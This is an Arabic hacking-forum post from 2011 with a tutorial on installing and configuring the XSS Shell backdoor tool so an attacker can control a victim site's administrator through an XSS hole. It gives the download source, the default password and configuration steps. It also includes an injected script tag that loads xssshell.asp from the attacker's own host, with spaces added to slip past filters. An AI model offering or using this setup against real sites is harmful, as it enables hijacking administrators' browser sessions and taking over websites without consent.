السلام عليكم ورحمه الله وبركاته
اليوم رح نبدا حركه حلوه ورائعه دعم ثغرات xss بسكربت للتحكم اون لاين بالهدف ...!!!
الفكره بالدرس
انك تلقى ثغره xss وتهاجم بمستوى اعلى من مجرد تحصل ع الكوكز الخاص بالادمن
ويكون هذا التحكم بعيد كل البعد عن الاكواد المعقده وهاد يكون بكل بساطه من خلال سكربت
xss shell
طريقه التنصيب
أول شيء تحميل الفايلات من هون
http://labs.portcullis.co.uk/downloa...xsstunnell.zip
بعدين ارفع الفولدر ع ايا استضافه تدعم لغه asp لانه شغلك رح يكون ع شركه asp
(ينفع استخدام السيرفر الشخصي اذا كان مركب عليه ip ثابت ) << ام التعقيد :P
Install Admin Interface
بعد نفك الضغط نرفع هاد ع فولدر بموقعك
xssshell
وهذا الفولدر
db
رابط السكربت يصير كالتالي
http://[vbspiders]/xssshell/
بطلب باسورد والباس الافتراضي هو
w00t
طيب هيك السكربت خلصنا تنصيبه بس لسا ضايل لنا خطوه ثانيه
Configure XSS Shell for communication
نفتح هذا الفايل
xssshell.asp
ندور ع كلمه
SERVER
نغير الي قدامها لرابط السكربت
يعني المكان الي رفعت عليه الفايلات هاي والخرابيط
"http://[YOURHOST]/xssshell/";
مثلا انا رفعته ع vbspiders
بصير هيك
"http://[vbspiders]/xssshell/";
وهيك انت تمام التمام
بكون جهزت الهجوم وكل اشي
طيب نستغل ثغره
xss
بزي كود التحويل او ايا كود بحيث انك تسحب المسكين ادمن الموقع للصفحه
وهذا احد الاكواد
< s c r i p t src="http://[vbspiders]/xssshell.asp"> < / s c r i p t >
مع ازاله المسافات بين كلمه سكربت
مش رح اشرح كل اشي زي الصغار المفروض مستوانا اعلى من هيك بس عشان التنصيب شويه فيه غلبه
شرحته
والباقي من خيارات السكربت اكتشفوها وهي بسيطه كثير
يديو تتوريال (ديمو )
http://www.securitytube.net/video/1098
المصدر
http://labs.portcullis.co.uk/application/xssshell/
مع خالص دعواتكم لي بالتوفيق بدراستي
شكر خاص لاخوكم ALQAYSAR
11-01-2011, 10:30 PM
XSS backdoor and zombie manager Really hell 
العرض الشجري
